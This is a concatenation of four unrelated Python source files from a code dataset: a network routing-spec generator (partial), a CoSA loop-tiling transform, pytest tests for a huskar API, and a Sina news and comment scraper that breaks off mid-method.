routers = ["pid == pid_t{64'd%d, 16'd%d}: 48'h%x;" % (lan.router, port, lan.router)
for lan in self.lans for port in g.node[lan.router]['ports'].values()]
routers = '\n '.join(routers)
out.write('''
function pid2mac(pid_t pid): MAC =
case {{
{hosts}
{routers}
default: 48'h0;
}}
'''.format(hosts=hosts, routers=routers))
# FUNCTION mac2pid
# Note the following assumptions on gateway routers:
# - all gateway routers have exactly two ports
# - port 1 connects to the gateway's zone
# - the other port is > 1 and connects to the router-to-router fabric
# (i.e. zone 0)
# NB: turns out this only needs to be defined for gateway router ports
# on the interior router fabric.
routers = []
for lan in self.lans:
assert(len(self.routers.node[lan.router]['ports']) == 1)
routers.append("mac == 48'h%x: pid_t{64'd%d, 16'd%d};" % (
lan.router, lan.router, self.routers.node[lan.router]['ports'].values()[0]))
routers = '\n '.join(routers)
out.write('''
function mac2pid(MAC mac): pid_t =
case {{
{routers}
default: pid_t{{64'd0, 16'd0}};
}}
'''.format(hosts=hosts, routers=routers))
# FUNCTION l3NextHop
m = []
for src_lan in self.lans:
for dst_lan in self.lans:
if src_lan == dst_lan:
continue
m.append("rid == 64'd%d and vid == 12'd%d: nexthop_t{48'h%x, 16'd%d};" % (
src_lan.router,
dst_lan.vlan,
dst_lan.router,
self.routers.node[src_lan.router]['ports'].values()[0] ))
m = '\n '.join(m)
out.write('''
function l3NextHop(hid_t rid, vid_t vid): nexthop_t =
case {{
{m}
default: nexthop_t{{48'h0, 16'd0}};
}}
'''.format(m=m))
# FUNCTION cSwitch
local_switches = ["sid == 64'd%d" % n
for lan in self.lans
for n in lan.g
if lan.g.node[n]['type'] == 'switch']
router_switches = ["sid == 64'd%d" % n
for n in self.routers
if self.routers.node[n]['type'] == 'switch']
routers = ["sid == 64'd%d" % lan.router for lan in self.lans]
switches = ' or\n '.join(local_switches + router_switches + routers)
out.write('''
function cSwitch(hid_t sid): bool =
{switches}
'''.format( switches=switches ))
# FUNCTION link
local_links = ["pid == pid_t{64'd%d, 16'd%d}: pid_t{64'd%d, 16'd%d};" % (
n, lan.g.node[n]['ports'][neighbor], neighbor, lan.g.node[neighbor]['ports'][n])
for lan in self.lans for n in lan.g for neighbor in lan.g.node[n]['ports']]
local_links = '\n '.join(local_links)
router_links = ["pid == pid_t{64'd%d, 16'd%d}: pid_t{64'd%d, 16'd%d};" % (
n, self.routers.node[n]['ports'][neighbor], neighbor, self.routers.node[neighbor]['ports'][n])
for n in self.routers for neighbor in self.routers.node[n]['ports']]
router_links = '\n '.join(router_links)
out.write('''
function link(pid_t pid): pid_t =
case {{
{local_links}
{router_links}
default: pid_t{{64'd0, 16'd0}};
}}
'''.format( local_links = local_links
, router_links = router_links ))
# FUNCTION l2distance
path_lengths = networkx.shortest_path_length(g)
max_shortest_path = max([path_lengths[src][dst] for src in g for dst in g])
max_shortest_zone_path = max([path_lengths[lan.router][h.mac] for lan in self.lans for h in lan.hosts])
assert(max_shortest_path > max_shortest_zone_path)
distances, out_ports = cocoon_of_networkx(g)
# l2distance(sw, vid, dst) cases:
# From the whiteboard:
#
# if sw in vid zone and dst in vid zone:
# shortest path routing to dst.
# if sw is not core switch and not in vid zone and dst not in vid zone:
# route to gateway.
# if sw in core and dst not special case:
# route to gateway (vid)
# if sw in core and dst is special case:
# route to dst
# if sw in core and dst is gateway router:
# route to gateway (dst)
#
# Reworked:
#
# sw in vid zone and dst is host in vid zone
# sw in vid zone and dst is host not in vid zone
# sw in vid zone (not core) and dst is router: forward to router
# sw in core and dst is host in vid zone (i.e. not special)
# sw in core and dst is host not in vid zone (i.e. special)
# sw in core and dst is router: forward to router
# sw not in vid zone and dst is host in vid zone
# sw not in vid zone and dst is host not in vid zone: drop
# sw not in vid zone (but also not core) and dst is router
#
# Idea: use fall-through nature of 'case' statements to prioritize
# as follows.
#
# 1. Do destination L2 routing for all special hosts (i.e. not in
# their home zone) for in-VLAN traffic.
# 2. For zone switches, send non-zone traffic to local gateway.
# 3. For zone switches (and routers), send local (in-zone) traffic
# to local host.
# 4. For zone switches, send router-destined traffic to local gateway.
# 5. For core switches (and routers), send vlan traffic to vlan
# gateway.
# 6. For core switches (and routers), send router-destined traffic
# to router.
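        # For illustration (hypothetical values), two emitted entries ordered by the priorities above:
        #   hid == 64'd3 and vid == 12'd10 and dstaddr == 48'h7: 8'd2;   <- step 1: special host, most specific
        #   hid == 64'd3 and vid != 12'd0 and vid != 12'd10: 8'd9;       <- step 2: remaining non-zone traffic
        # Earlier entries win in the Cocoon 'case', so the more specific rules must be emitted first.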
use_optimized = True
if use_optimized:
# 1. Do destination L2 routing for all special hosts (i.e. not in
# their home zone) for in-VLAN traffic.
d1 = []
f1 = []
# For each host not in the zone associated with its subnet:
for lan in self.lans:
for h in lan.get_nonlocal_hosts():
for switch in g:
if g.node[switch]['type'] == 'host':
continue
d1.append("hid == 64'd%d and vid == 12'd%d and dstaddr == 48'h%x: 8'd%d;" % (
switch, h.vlan, h.mac, distances[switch][h.mac]))
f1.append("hid == 64'd%d and vid == 12'd%d and dstaddr == 48'h%x: 16'd%d;" % (
switch, h.vlan, h.mac, out_ports[switch][h.mac]))
# 2. For zone switches, send non-zone traffic to local gateway.
d2 = []
f2 = []
for lan in self.lans:
for switch in lan.g:
if lan.g.node[switch]['type'] != 'switch':
continue
d2.append("hid == 64'd%d and vid != 12'd0 and vid != 12'd%d: 8'd%d;" % (
switch, lan.vlan, distances[switch][lan.router] + 2 * max_shortest_path))
f2.append("hid == 64'd%d and vid != 12'd0 and vid != 12'd%d: 16'd%d;" % (
switch, lan.vlan, out_ports[switch][lan.router]))
# 3. For zone switches (and routers), send local (in-zone) traffic
# to local host.
d3 = []
f3 = []
for lan in self.lans:
for switch in lan.g:
if lan.g.node[switch]['type'] == 'host':
continue
for h in lan.hosts:
# Skip hosts not part of this zone's VLAN.
if h.vlan != lan.vlan:
continue
d3.append("hid == 64'd%d and vid == 12'd%d and dstaddr == 48'h%x: 8'd%d;" % (
switch, lan.vlan, h.mac, distances[switch][h.mac]))
f3.append("hid == 64'd%d and vid == 12'd%d and dstaddr == 48'h%x: 16'd%d;" % (
switch, lan.vlan, h.mac, out_ports[switch][h.mac]))
# 4. For zone switches, send router-destined traffic to local gateway.
d4 = []
f4 = []
for lan in self.lans:
for switch in lan.g:
if lan.g.node[switch]['type'] != 'switch':
continue
d4.append("hid == 64'd%d and vid != 12'd0 and dstaddr == 48'h%x: 8'd%d;" % (
switch, lan.router, distances[switch][lan.router]))
f4.append("hid == 64'd%d and vid != 12'd0 and dstaddr == 48'h%x: 16'd%d;" % (
switch, lan.router, out_ports[switch][lan.router]))
# 5. For core switches (and routers), send vlan traffic to vlan
# gateway.
d5 = []
f5 = []
for lan in self.lans:
for switch in self.routers:
if switch == lan.router:
continue
d5.append("hid == 64'd%d and vid == 12'd%d: 8'd%d;" % (
switch, lan.vlan, distances[switch][lan.router] + 2 * max_shortest_zone_path))
f5.append("hid == 64'd%d and vid == 12'd%d: 16'd%d;" % (
switch, lan.vlan, out_ports[switch][lan.router]))
# 6. For core switches (and routers), send router-destined traffic
# to router.
d6 = []
f6 = []
for lan in self.lans:
for switch in self.routers:
if switch == lan.router:
continue
d6.append("hid == 64'd%d and dstaddr == 48'h%x: 8'd%d;" % (
switch, lan.router, distances[switch][lan.router]))
f6.append("hid == 64'd%d and dstaddr == 48'h%x: 16'd%d;" % (
switch, lan.router, out_ports[switch][lan.router]))
out.write('''
function l2distance(hid_t hid, vid_t vid, MAC dstaddr): uint<8> =
case {{
{d1}
{d2}
{d3}
{d4}
{d6}
{d5}
default: 8'd0;
}}
'''.format( d1='\n '.join(d1)
, d2='\n '.join(d2)
, d3='\n '.join(d3)
, d4='\n '.join(d4)
, d5='\n '.join(d5)
, d6='\n '.join(d6) ))
# FUNCTION l2NextHop
out.write('''
function l2NextHop(hid_t hid, vid_t vid, MAC dstaddr): uint<16> =
case {{
{f1}
{f2}
{f3}
{f4}
{f6}
{f5}
default: 16'd0;
}}
'''.format( f1='\n '.join(f1)
, f2='\n '.join(f2)
, f3='\n '.join(f3)
, f4='\n '.join(f4)
, f5='\n '.join(f5)
, f6='\n '.join(f6) ))
else:
distances_to_hosts = []
ports_to_hosts = []
for switch in g:
if g.node[switch]['type'] == 'host':
continue
for lan in self.lans:
# Every switch to host forwarding.
for h in lan.hosts:
distances_to_hosts += ["hid == 64'd%d and vid == 12'd%d and dstaddr == 48'h%x: 8'd%d;" % (
switch, h.vlan, h.mac, distances[switch][h.mac])]
ports_to_hosts += ["hid == 64'd%d and vid == 12'd%d and dstaddr == 48'h%x: 16'd%d;" % (
switch, h.vlan, h.mac, out_ports[switch][h.mac])]
# Zone to local gateway forwarding.
if switch in lan.g and switch != lan.router:
distances_to_hosts += ["hid == 64'd%d and vid != 12'd0 and dstaddr == 48'h%x: 8'd%d;" % (
switch, lan.router, distances[switch][lan.router])]
ports_to_hosts += ["hid == 64'd%d and vid != 12'd0 and dstaddr == 48'h%x: 16'd%d;" % (
switch, lan.router, out_ports[switch][lan.router])]
distances_to_hosts = '\n '.join(distances_to_hosts)
ports_to_hosts = '\n '.join(ports_to_hosts)
distances_to_routers = []
ports_to_routers = []
# Router-to-router fabric forwarding.
for switch in self.routers:
for lan in self.lans:
if switch == lan.router or g.node[switch]['type'] == 'host':
continue
distances_to_routers += ["hid == 64'd%d and vid == 12'd0 and dstaddr == 48'h%x: 8'd%d;" % (
switch, lan.router, distances[switch][lan.router])]
ports_to_routers += ["hid == 64'd%d and vid == 12'd0 and dstaddr == 48'h%x: 16'd%d;" % (
switch, lan.router, out_ports[switch][lan.router])]
distances_to_routers = '\n '.join(distances_to_routers)
ports_to_routers = '\n '.join(ports_to_routers)
out.write('''
function l2distance(hid_t hid, vid_t vid, MAC dstaddr): uint<8> =
case {{
{distances_to_hosts}
{distances_to_routers}
default: 8'd0;
}}
'''.format( distances_to_hosts = distances_to_hosts
, distances_to_routers = distances_to_routers ))
# FUNCTION l2NextHop
out.write('''
function l2NextHop(hid_t hid, vid_t vid, MAC dstaddr): uint<16> =
case {{
{ports_to_hosts}
{ports_to_routers}
default: 16'd0;
}}
'''.format( ports_to_hosts = ports_to_hosts
, ports_to_routers = ports_to_routers ))
# FUNCTION cPort
pids = ["pid == pid_t{64'd%d, 16'd%d}" % (n, port)
for n in g
for port in g.node[n]['ports'].values()
if g.node[n]['type'] == 'switch' or g.node[n]['type'] == 'router']
pids = ' or\n '.join(pids)
out.write('''
function cSwitchPort(pid_t pid): bool =
{pids}
'''.format(pids=pids))
# FUNCTION cPort
pids = ["pid == pid_t{64'd%d, 16'd%d}" % (n, port)
for n in g
for port in g.node[n]['ports'].values()
if g.node[n]['type'] == 'router' and port != 1]
pids = ' or\n '.join(pids)
out.write('''
function cRouterPort(pid_t pid): bool =
{pids}
'''.format(pids=pids))
# FUNCTION mac2hid
m = ["mac == 48'h%x: 64'd%d;" % (h.mac, h.mac) for lan in self.lans for h in lan.hosts]
m = '\n '.join(m)
out.write('''
function mac2hid(MAC mac): hid_t =
case {{
{m}
default: 64'd0;
}}
'''.format(m=m))
# FUNCTION hid2mac
m = ["hid == 64'd%d: 48'h%x;" % (h.mac, h.mac) for lan in self.lans for h in lan.hosts]
m = '\n '.join(m)
out.write('''
function hid2mac(hid_t hid): MAC =
case {{
{m}
default: 48'h0;
}}
'''.format(m=m))
# FUNCTION ip2vid
m = ["ip == 32'd%d: 12'd%d;" % (int_of_ip(h.ip), h.vlan) for lan in self.lans for h in lan.hosts]
m = '\n '.join(m)
out.write('''
function ip2vid(IP4 ip): vid_t =
case {{
{m}
default: 12'd0;
}}
'''.format(m=m))
# FUNCTION vidRouter
m = ["vid == 12'd%d: 64'd%d;" % (lan.vlan, lan.router) for lan in self.lans]
m = '\n '.join(m)
out.write('''
function vidRouter(vid_t vid): hid_t =
case {{
{m}
default: 64'd0;
}}
'''.format(m=m))
if __name__ == '__main__':
random.seed(0)
parser = argparse.ArgumentParser()
parser.add_argument( "num_lans"
, help="number of LANs"
, type=int)
parser.add_argument( "num_lan_hosts"
, help="number of hosts per LAN"
, type=int)
parser.add_argument( "num_acl_rules"
, help="number of (hostIP, dstIP) blacklist ACL rules"
, type=int)
parser.add_argument( "num_fabric_switches"
, help="number of switches connecting gateway routers"
, type=int)
parser.add_argument( "num_lan_switches"
, help="number of switches per LAN"
, type=int)
parser.add_argument( "--export_hsa"
, help="Export the configuration information for Spec0 and Spec3 to apply header space analysis."
, type=argparse.FileType('w') )
parser.add_argument( "--export_cocoon"
, help="Export the configuration information for Spec0 and Spec3 to apply Cocoon. (Not yet implemented.)"
, type=argparse.FileType('w') )
parser.add_argument( "--debug"
, help="print debug info"
, action="store_true" )
args = parser.parse_args()
if args.num_lans < 2:
sys.stderr.write('must have at least 2 LANs')
sys.exit(1)
if args.num_lan_hosts < 1:
sys.stderr.write('must have at least 1 host per LAN')
sys.exit(1)
if args.num_acl_rules < 1:
sys.stderr.write('must have at least 1 ACL rule')
sys.exit(1)
if args.num_fabric_switches < 1:
sys.stderr.write('must have at least 1 fabric switch')
sys.exit(1)
if args.num_lan_switches < 1:
sys.stderr.write('must have at least 1 switch per LAN')
sys.exit(1)
p = PurdueNetwork( args )
# spec0 = p.gen_spec_0()
# spec1 = p.gen_spec_1(spec0)
# spec2 = p.gen_spec_2(spec1)
# spec3 = p.gen_spec_3(spec2)
spec01 = p.gen_spec_0_1()
spec11 = p.gen_spec_1_1()
spec21 = p.gen_spec_2_1(spec11)
spec3 = p.gen_spec_3(spec21)
if args.export_cocoon:
p.export_cocoon()
def num_to_spec(n):
if n == 0:
return spec01
if n == 1:
return spec11
if n == 2:
return spec21
if n == 3:
return spec3
for i in xrange(3):
out_file = 'cmp%s%s.prd' % (i, i+1)
print 'Writing Spec%s vs. Spec%s to %s' % (i, i+1, out_file)
out = file(out_file, 'w')
out.write('\n(\n%s\n)\nvlan := 0; ethDst := 0\n' % num_to_spec(i+1))
out.write('\n<=\n\n')
out.write('\n(\n%s\n)\nvlan := 0; ethDst := 0\n' % num_to_spec(i))
out.close()
# Clean up.
if args.export_hsa:
args.export_hsa.close()
if args.export_cocoon:
args.export_cocoon.close()
| StarcoderdataPython |
84229 | from __future__ import annotations
from cmath import cos
import sys
from exo import proc, Procedure, DRAM, config, instr, QAST
import matmap.base as matmap
from matmap.qast_utils.loopReader import *
import matmap.transforms.TilingTransform as ts
import matmap.transforms.ReorderingTransform as rs
from matmap.cosa.src.cosa import *
from matmap.cosa.src.cosa_constants import _A, _B
from matmap.cosa.src.cosa_input_objs import Prob, Arch, Mapspace
class CoSATransform(matmap.CompoundTransform):
    # Takes in all of the CoSA parameters needed to create this transform object.
def __init__(self, cosa_parameters, obj):
self.cosa_parameters = cosa_parameters
self.obj = obj
self.run_cosa()
self.subschedules = self.helper()
    # Runs CoSA, stores its results on this object, and also creates the reordering schedule and tiling config.
def run_cosa(self):
parser = construct_argparser()
args, unknown = parser.parse_known_args()
prob_path = pathlib.Path(args.prob_path).resolve()
arch_path = pathlib.Path(args.arch_path).resolve()
mapspace_path = pathlib.Path(args.mapspace_path).resolve()
output_path = args.output_dir
status_dict = {}
prob = Prob(prob_path)
arch = Arch(arch_path)
self.tiling_config = prob.prob_factors
# An object defines the user-defined bypass pattern.
mapspace = Mapspace(mapspace_path)
mapspace.init(prob, arch)
# even mapping
B = _B
Z = None
# uneven mapping config
# Z = _Z
# B = None
# partition ratios for W, IA, OA
part_ratios = [
[1, 0, 0],
[0, 0, 1],
[1, 0, 0],
[0, 1, 0],
[0, 0.25, 0.75],
[0.33, 0.33, 0.33],
]
self.factor_config, self.spatial_config, outer_perm_config, self.run_time = cosa(prob, arch, _A, B, part_ratios, global_buf_idx=4,
Z=Z)
        # Parse the CoSA permutation output and prepare to create the reordering object
loops = readLoopNest(self.obj)[0]
loop_list = []
for loop in loops:
loop_list.append(loop.name)
loop_order = {}
num = 0
for i in outer_perm_config:
loop_order[i] = loop_list[num]
num += 1
self.perm_config = []
for i in range(len(outer_perm_config)):
self.perm_config.append(loop_order[i])
self.perm_sched = rs.ReorderingTransform(self.perm_config)
#parse cosa tiling_config and prepare to create tiling obj
self.tile_dict = self.tiling_config
def helper(self):
transformations = []
transformations.append(self.perm_sched)
        # self.tile_dict is a 2-D list containing the tiling factors for each loop
        # The order of self.tile_dict has to follow the loop order -- this can change if needed to output a dictionary
        # [] throws an error if it is a tile, but can be modified to accommodate that.
#TODO: Error checks
# Tiling Transform
loop_vars = getNestVars(self.obj)
full_tile_dict = {}
tiles = dict()
for i in range(len(loop_vars)):
full_tile_dict[loop_vars[i]] = self.tile_dict[i]
i = 0
while full_tile_dict:
tiles = {}
for x in full_tile_dict.keys():
temp = full_tile_dict[x]
#for case when split is 1 or there is just one number to split loop on
if(temp[0] == 1 or len(temp) == 1):
full_tile_dict[x].pop(0)
continue
tiles[x + "o" * i] = temp[0]
full_tile_dict[x].pop(0)
tile_sched = ts.TilingTransform(tiles)
transformations.append(tile_sched)
delete = [key for key in full_tile_dict if full_tile_dict[key] == []]
for key in delete: del full_tile_dict[key]
i += 1
return transformations
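# Illustrative usage sketch (hedged: 'cosa_args' and 'proc' are hypothetical placeholders for the
# CoSA CLI arguments and an exo Procedure; neither name comes from this file):
#     ct = CoSATransform(cosa_args, proc)
#     reorder, *tilings = ct.subschedules  # a ReorderingTransform followed by TilingTransforms
# subschedules holds the sub-transforms in the order they are meant to be applied to the kernel.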
| StarcoderdataPython |
3329419 | from __future__ import absolute_import
from hashlib import md5
from flask import request
from pytest import fixture, raises, mark
from huskar_api import settings
from huskar_api.app import create_app
from huskar_api.api.utils import (
api_response, with_etag, deliver_email_safe, with_cache_control)
from huskar_api.extras.email import EmailTemplate, EmailDeliveryError
from huskar_api.service.exc import DuplicatedEZonePrefixError
from huskar_api.service.utils import (
check_cluster_name, check_cluster_name_in_creation)
from ..utils import assert_response_ok
@fixture
def app():
app = create_app()
app.config['PROPAGATE_EXCEPTIONS'] = False
@app.route('/api/test_etag')
@with_etag
def test_etag():
return api_response(data={
'233': request.args.get('value', '666'),
})
@app.route('/api/test_cache_control')
@with_cache_control
def test_cache_control():
return api_response()
@app.route('/api/test_email')
def test_email():
deliver_email_safe(EmailTemplate.DEBUG, '<EMAIL>', {'foo': 't'})
return api_response()
return app
def test_etag(client):
url = '/api/test_etag'
r = client.get(url)
assert_response_ok(r)
etag = '"{0}"'.format(md5(r.data).hexdigest())
assert r.headers['ETag'] == etag
r = client.get(url, headers={'If-None-Match': etag}, buffered=True)
assert r.status_code == 304
assert r.headers['ETag'] == etag
assert r.data == ''
url = '/api/test_etag?value=233'
r = client.get(url, headers={'If-None-Match': etag}, buffered=True)
assert_response_ok(r)
assert r.headers['ETag'] != etag
assert r.data != ''
def test_cache_control(client, mocker):
url = '/api/test_cache_control'
r = client.get(url)
assert_response_ok(r)
assert 'Cache-Control' not in r.headers
mocker.patch.object(settings, 'CACHE_CONTROL_SETTINGS', {
'test_cache_control': {'max_age': 3, 'public': True},
})
r = client.get(url)
assert_response_ok(r)
assert set(r.headers.get('Cache-Control').split(', ')
) == {'max-age=3', 'public'}
def test_email(client, mocker):
deliver_email = mocker.patch('huskar_api.api.utils.deliver_email')
deliver_email.side_effect = [None, EmailDeliveryError()]
logger = mocker.patch('huskar_api.api.utils.logger', autospec=True)
r = client.get('/api/test_email')
assert_response_ok(r)
logger.exception.assert_not_called()
r = client.get('/api/test_email')
assert_response_ok(r)
logger.exception.assert_called_once()
@mark.parametrize('cluster_name,valid', [
('stable', True),
('stable-altb1', True),
('stable-altb1-stable', True),
('altb1', True),
('altb1-stable', True),
('altb1-altb1-stable', False),
('altb1-altb1-altb1-stable', False),
('altb1-alta1-stable', True),
('altb1-altb1-alta1-stable', False),
('altb1-alta1-alta1-stable', True),
])
def test_check_cluster_name(mocker, cluster_name, valid):
mocker.patch('huskar_api.settings.ROUTE_EZONE_LIST', ['altb1', 'alta1'])
if not valid:
with raises(DuplicatedEZonePrefixError):
check_cluster_name(cluster_name)
else:
assert check_cluster_name(cluster_name)
@mark.parametrize('cluster_name,valid', [
('stable', True),
('stable-altb1', True),
('stable-altb1-stable', True),
('altb1', True),
('altb1-stable', True),
('altb1-altb1-stable', False),
('altb1-altb1-altb1-stable', False),
('altb1-alta1-stable', True),
('altb1-altb1-alta1-stable', False),
('altb1-alta1-alta1-stable', True),
])
def test_check_cluster_name_in_creation(mocker, cluster_name, valid):
mocker.patch('huskar_api.settings.ROUTE_EZONE_LIST', ['altb1', 'alta1'])
if not valid:
with raises(DuplicatedEZonePrefixError):
check_cluster_name_in_creation(cluster_name)
else:
assert check_cluster_name_in_creation(cluster_name)
| StarcoderdataPython |
3278434 | <filename>ReptileStrategy.py
import os
import re
import urllib
import urllib.request
import time
import requests
from selenium import webdriver
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from bs4 import BeautifulSoup
class ReptileStrategy:
MODE_OF_STATIC = 0
MODE_OF_DYNAMIC = 1
MODE_OF_FAST_DYNAMIC = 2
def __init__(self, URL, mode=MODE_OF_STATIC, e_id=""):
        # Crawl static pages by default
os.environ['http_proxy'] = ''
        # Keep the original URL
self.originalURL = URL
self.mode = mode
        # Set up the driver or bsObj depending on the mode
if mode == self.MODE_OF_STATIC:
            # Build the request with headers and fetch the HTML text
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}
req = urllib.request.Request(url=URL, headers=headers)
html = urllib.request.urlopen(req)
self.bsObj = BeautifulSoup(html, features="html.parser")
elif mode == self.MODE_OF_DYNAMIC:
# timeA = time.time()
self.bsObj = self.driverInit()
# timeB = time.time()
# print("Normal", timeB-timeA)
elif mode == self.MODE_OF_FAST_DYNAMIC:
timeA = time.time()
self.bsObj = self.driverInit_Fast(e_id)
timeB = time.time()
print("Fast", timeB - timeA)
def driverInit(self):
"""
use driver to resolve JS
and then close it
:return prepared bsObj
"""
options = webdriver.ChromeOptions()
options.add_argument("--headless")
driver = webdriver.Chrome(executable_path="chromedriver.exe", options=options)
driver.set_page_load_timeout(40)
try:
            # May loop indefinitely: the except branch below retries via recursion
driver.get(self.originalURL)
driver.execute_script('window.scrollTo(0,document.body.scrollHeight)')
except Exception as e:
print(e)
driver.close()
return self.driverInit()
bsObj = BeautifulSoup(driver.page_source, features="html.parser")
time.sleep(2)
driver.close()
return bsObj
def driverInit_Fast(self, e_id):
        # Oddly enough, this approach turned out to run even slower than the other one
        # Configure the page load strategy: the default is to wait for the page to finish loading; setting it to "none" skips the wait so get() returns as soon as it is issued
desired_capabilities = DesiredCapabilities.PHANTOMJS
desired_capabilities["pageLoadStrategy"] = "none"
options = webdriver.ChromeOptions()
options.add_argument("--headless")
driver = webdriver.Chrome(executable_path="chromedriver.exe", options=options)
try:
driver.get(self.originalURL)
wait = WebDriverWait(driver, 40, 0.5)
wait.until(lambda d: d.find_element_by_id('bottom_sina_comment'))
# wait.until(lambda d: d.find_element_by_class_name('hd clearfix'))
time.sleep(3)
except Exception as e:
print(e)
return self.__init__(self.originalURL, self.MODE_OF_STATIC)
        # BeautifulSoup parsing time is negligible
bsObj = BeautifulSoup(driver.page_source, features="html.parser")
driver.close()
return bsObj
def get_Title(self):
pass
def get_Content(self):
pass
def get_URL(self):
pass
class Jsty_Strategy(ReptileStrategy):
    # jstv.com (Lizhi News): the timestamp can already be read from the URL, so there is no need to fetch it separately
    # According to the TA, the idea seems to be to use these few sites to reverse-filter the information sources?
def __init__(self, URL):
        super().__init__(URL)
def get_Title(self):
return self.bsObj.head.title.get_text()
def get_Content(self):
        # Gotcha: get_text is a method, not an attribute
info = self.bsObj.find("p", {"class": "info fL"})
time = info.find("span", {"class": "time"}).get_text()
source = info.find("span", {"class": "source"}).get_text()
content = self.bsObj.find("div", {"class": "content"}).findAll("p")
file = open("testArticle.txt", "a", encoding='utf-8')
file.write("标题: " + self.get_Title() + "\n")
file.write("时间: " + time + "\n")
file.write("来源: " + source + "\n")
for p in content:
file.write(p.get_text() + "\n")
file.write("-----------END-------------\n")
file.close()
class Sina_Strategy(ReptileStrategy):
# https://search.sina.com.cn/?q=%E6%96%B0%E5%86%A0&c=news&range=all&stime=2020-01-01&etime=2020-06-01&time=2020&page=2
# https://search.sina.com.cn/?q=%E6%96%B0%E5%86%A0&c=news&range=all&time=2020&stime=2020-01-01%2000:00:00&etime=2020-06-01%2023:59:59&num=20
    # Can't crawl the JS-rendered page, so fall back to URL analysis: (URL-encoded query keyword, here "新冠"/COVID-19) (year)
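    # For illustration (the keyword and page number are hypothetical), such a search URL can be assembled as:
    #   'https://search.sina.com.cn/?q=%s&c=news&range=all&time=2020&page=1' % urllib.parse.quote('新冠')
    # getURL() below harvests the article links from each result page and getNextPage() bumps 'page='.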
def get_Title(self):
return self.bsObj.find("h1", {"class": "main-title"}).get_text()
    # Used for the first database insert: only records the source, time and URL
def get_Simple_Content(self):
time = self.bsObj.find("span", {"class": "date"}).get_text()
        # time = time[0:4]+time[5:7]+time[8:10] # 20200601, i.e. year-month-day
# '2020-01-22+99:00:00&'
etime = time[0:4] + "-" + time[5:7] + "-" + time[8:10] + "+" + time[12:18] + ":00&"
        time = time[2:4] + time[5:7] + time[8:10] + time[12:14] # yymmddHH, e.g. year 20, month 06, day 01, hour 23
try:
source = self.bsObj.find("a", {"class": "source"}).get_text()
except AttributeError as e:
print(e)
source = "来源不明"
url = self.originalURL
        # Works, though a bit hacky
res = [source, time, url, etime]
return res
# include time article source
def get_Content(self):
article = self.bsObj.find("div", {"id": "article"}).findAll("p")
time = self.bsObj.find("span", {"class": "date"}).get_text()
source = self.bsObj.find("a", {"class": "source"}).get_text()
file = open("testArticle.txt", "a", encoding='utf-8')
file.write("标题: " + self.get_Title() + "\n")
file.write("时间: " + time + "\n")
file.write("来源: " + source + "\n")
for p in article:
file.write(p.get_text() + "\n")
file.write("-----------END-------------\n")
file.close()
def get_Comment_Resolve(self):
assert self.mode == self.MODE_OF_DYNAMIC
hd_clearfix = self.bsObj.find("div", {"id": "bottom_sina_comment"})
comment_s_a = hd_clearfix.find("a", {"data-sudaclick": "comment_sum_p"})
if comment_s_a is None:
            # The comment section failed to load
raise LoadMissException(self.originalURL)
# comment_url = comment_s_a.attrs['href']
comment = []
        # 1. Scrape the hottest comments
comment_div = hd_clearfix.find("div", {"comment-type": "hotList"}).findAll("div", {"class": "item clearfix"})
for div in comment_div:
comment.append(div.find("div", {"class": "txt"}).get_text())
        # 2. Scrape the latest comments
try:
# todo Something wrong
comment_div = hd_clearfix.find("div", {"comment-type": "latestList"}).findAll("div",
{"class": "item clearfix"})
for div in comment_div:
comment.append(div.find("div", {"class": "txt"}).get_text())
except Exception as e:
print("sina_getcomment" + e)
comment_sum = int(comment_s_a.get_text())
return [comment_sum, comment]
def get_Comment_Request(self):
"""
        :return: [[attendance, comment_sum], [[province, time, content, rank], ...]]
"""
assert self.mode == self.MODE_OF_STATIC
sina_comment_server = "http://comment5.news.sina.com.cn/page/info?"
newsid = self.getNewsID()
channel = self.getChannel()
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}
param = {
"format": 'json',
'channel': channel,
'newsid': newsid,
'page': '1'
}
for i in range(5):
response = requests.get(sina_comment_server, params=param, headers=headers)
res = response.json()['result']
            # Extract the needed fields from the JSON response
try:
comment_sum = res['count'].get("show")
comment_attendance = res['count'].get('total')
comment = []
break
except Exception as e:
if i <= 3:
print("小歇一下-PhaseA")
time.sleep(0.5)
continue
else:
file = open("../Log/runTimeExceptionUrls.txt", "a+")
file.writelines(self.originalURL + "\n")
print(e, end="")
print(self.originalURL)
if not res.get('cmntlist'):
raise RequestMissException(self.originalURL)
# return [0, []]
cmntlist = res['cmntlist']
for cmn in cmntlist:
cmntime = cmn.get('time').replace("-", "").replace(" ", "")
cmntime = cmntime[2:10]
cmnProvince = cmn.get('area')[0:2]
            # TODO: possibly buggy
rank = cmn.get('rank')
comment.append([cmnProvince, cmntime, cmn.get('content'), rank])
# Many Pages
if comment_sum >= 20:
for i in range(2, int(comment_sum / 20)):
for j in range(0, 4):
param['page'] = str(i)
response = requests.get(sina_comment_server, params=param, headers=headers)
res = response.json()['result']
                    # Extract the needed fields from the JSON response
try:
# res = response.json()['result']
res['count'].get("show")
break
except Exception as e:
if j <= 3:
print("Sleep:PhaseB For page " + str(i) + " For time " + str(j))
time.sleep(0.5)
continue
else:
print(e, end="")
print(self.originalURL)
try:
cmntlist = res['cmntlist']
for cmn in cmntlist:
cmntime = cmn.get('time').replace("-", "").replace(" ", "")
cmntime = cmntime[2:10]
cmnProvince = cmn.get('area')[0:2]
# todo 可能有bug
rank = cmn.get('rank')
comment.append([cmnProvince, cmntime, cmn.get('content'), rank])
except Exception as e:
print(e, end="")
print("这里不应该有问题", end="")
print(self.originalURL)
        # Simple data cleaning
return [[comment_attendance, comment_sum], comment]
def getURL(self):
urlSet = set()
res = self.bsObj.findAll("div", {"class": "box-result clearfix"})
for div in res:
# oneUrl = div.find("h2").find("a", {"href": re.compile("https://news\.sina\.com(.*)")})
oneUrl = div.find("h2").find("a", {"href": re.compile("https://news\.sina\.com\.cn/(c|o|zx|gov|w|s)(.*)")})
if oneUrl is not None:
oneUrl = oneUrl.attrs['href']
else:
continue
if oneUrl not in urlSet:
urlSet.add(oneUrl)
return urlSet
    # Move to the next page by incrementing page= in the URL
def getNextPage(self):
res = self.originalURL
index = self.originalURL.find("page=")
page_num = res[index + 5:]
next_page_num = str(int(page_num) + 1)
res = res[0:index + 5] + next_page_num
return res
def getNewsID(self):
